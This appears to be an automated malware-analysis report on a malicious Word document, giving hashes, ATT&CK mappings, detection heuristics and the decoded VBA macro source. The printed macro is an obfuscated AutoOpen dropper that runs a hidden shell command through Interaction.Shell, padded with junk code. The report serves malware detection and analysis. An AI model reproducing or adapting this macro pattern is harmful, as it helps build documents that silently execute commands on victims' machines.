Office (OLE) malware analysis — malicious · 489404893d239db2

MALICIOUS

Office (OLE)

148.9 KB Created: 2018-12-20 17:16:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: af475c61bd25d19cc9544b61184e46b8 SHA-1: 2e6685bcf95c15f10cec74b576fb2622433db762 SHA-256: 489404893d239db2c03be9340cba2cd46449c9af6cd73129e6e6ab18be68262f

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The presence of a Shell() call and a suspicious cmd.exe invocation strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 8

ClamAV: Doc.Malware.Generic-6791421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6791421-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

      End Select
Z10613 = Array(Q458604, q206683, o91403668, Interaction.Shell(CVar("" + w866314 + l64342 + P185603 + t41891071 + v52296721843.TextBox1) + T51909 + i57458 + F01868719, 49 - 49), m176020)
   Select Case U1257080337759857790387

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X882849603

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5230 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5230 bytes
SHA-256: `c44332bedc2ba3d0bd21249f0bff3bc75ad51a9e9a6b21e3647f3eb3cc32c7cb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "v52296721843" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() X882849603 End Sub Attribute VB_Name = "o96959498790" Function X882849603() On Error Resume Next Select Case n062675306161275 Case 60135391 f423 = E944 o3776 = CInt(K707 / CByte(B278)) a179 = N7084 Case 321606717 h5333 = Z8050 v1563 = J6636 k5166 = CInt(t2571 / CByte(V9872)) Case 11603683 C110 = o2722 z494 = o5023 End Select Select Case I99264212941631598295 Case 280342777 R935 = W588 P865 = CInt(M6801 / CByte(N1003)) z634 = S654 Case 104312365 n7717 = M651 a726 = o1935 R626 = CInt(I4113 / CByte(f0355)) Case 218282591 k581 = C6267 T6167 = G014 End Select Z10613 = Array(Q458604, q206683, o91403668, Interaction.Shell(CVar("" + w866314 + l64342 + P185603 + t41891071 + v52296721843.TextBox1) + T51909 + i57458 + F01868719, 49 - 49), m176020) Select Case U1257080337759857790387 Case 224357340 C6182 = w855 I581 = CInt(X632 / CByte(V2368)) n9674 = n758 Case 50103472 J800 = Z339 o8256 = h493 b309 = CInt(q8727 / CByte(P625)) Case 204247711 m835 = z1850 i0190 = h5126 End Select Select Case m56681893005131862962125 Case 90238850 V3775 = z315 J031 = CInt(i1998 / CByte(j1702)) i8414 = i5365 Case 199358845 q363 = J654 E641 = i6062 c324 = CInt(E6761 / CByte(N4061)) Case 262072197 m724 = N509 o7605 = N059 End Select Select Case R2583957750860963362964 Case 123921465 T741 = L0912 a1505 = CInt(V318 / CByte(I4917)) S099 = m932 Case 207095607 J0069 = A387 f1234 = a039 v5149 = CInt(N784 / CByte(h1195)) Case 120549242 r895 = P8795 k249 = E5554 End Select Select Case z392400854900758 Case 113134832 a494 = s279 t7775 = CInt(a3684 / CByte(f9253)) M356 = j383 Case 195907325 A082 = r882 F222 = i6812 i1462 = CInt(Q057 / CByte(w1687)) Case 289508204 w581 = G1358 j1347 = u464 End Select End Function Attribute VB_Name = "r8464022" Attribute VB_Name = "j9623099036996" Attribute VB_Name = "M7779076460720" Attribute VB_Name = "J99201106059509" Attribute VB_Name = "b86500730880281" Attribute VB_Name = "j175937719582" Attribute VB_Name = "k72243029" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Q05354839" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "h69991359519" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "t43515600" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "h715418130736" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "z52932026069970" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "i23531543832" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: c44332bedc2ba3d0bd21249f0bff3bc75ad51a9e9a6b21e3647f3eb3cc32c7cb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "v52296721843"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X882849603
End Sub

Attribute VB_Name = "o96959498790"
Function X882849603()
On Error Resume Next
   Select Case n062675306161275
         Case 60135391
         f423 = E944
            o3776 = CInt(K707 / CByte(B278))
            a179 = N7084
         Case 321606717
         h5333 = Z8050
         v1563 = J6636
           k5166 = CInt(t2571 / CByte(V9872))
         Case 11603683
         C110 = o2722
         z494 = o5023
      End Select
   Select Case I99264212941631598295
         Case 280342777
         R935 = W588
            P865 = CInt(M6801 / CByte(N1003))
            z634 = S654
         Case 104312365
         n7717 = M651
         a726 = o1935
           R626 = CInt(I4113 / CByte(f0355))
         Case 218282591
         k581 = C6267
         T6167 = G014
      End Select
Z10613 = Array(Q458604, q206683, o91403668, Interaction.Shell(CVar("" + w866314 + l64342 + P185603 + t41891071 + v52296721843.TextBox1) + T51909 + i57458 + F01868719, 49 - 49), m176020)
   Select Case U1257080337759857790387
         Case 224357340
         C6182 = w855
            I581 = CInt(X632 / CByte(V2368))
            n9674 = n758
         Case 50103472
         J800 = Z339
         o8256 = h493
           b309 = CInt(q8727 / CByte(P625))
         Case 204247711
         m835 = z1850
         i0190 = h5126
      End Select
   Select Case m56681893005131862962125
         Case 90238850
         V3775 = z315
            J031 = CInt(i1998 / CByte(j1702))
            i8414 = i5365
         Case 199358845
         q363 = J654
         E641 = i6062
           c324 = CInt(E6761 / CByte(N4061))
         Case 262072197
         m724 = N509
         o7605 = N059
      End Select
   Select Case R2583957750860963362964
         Case 123921465
         T741 = L0912
            a1505 = CInt(V318 / CByte(I4917))
            S099 = m932
         Case 207095607
         J0069 = A387
         f1234 = a039
           v5149 = CInt(N784 / CByte(h1195))
         Case 120549242
         r895 = P8795
         k249 = E5554
      End Select
   Select Case z392400854900758
         Case 113134832
         a494 = s279
            t7775 = CInt(a3684 / CByte(f9253))
            M356 = j383
         Case 195907325
         A082 = r882
         F222 = i6812
           i1462 = CInt(Q057 / CByte(w1687))
         Case 289508204
         w581 = G1358
         j1347 = u464
      End Select
End Function


Attribute VB_Name = "r8464022"

Attribute VB_Name = "j9623099036996"

Attribute VB_Name = "M7779076460720"

Attribute VB_Name = "J99201106059509"

Attribute VB_Name = "b86500730880281"

Attribute VB_Name = "j175937719582"

Attribute VB_Name = "k72243029"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Q05354839"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "h69991359519"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "t43515600"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "h715418130736"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "z52932026069970"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "i23531543832"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.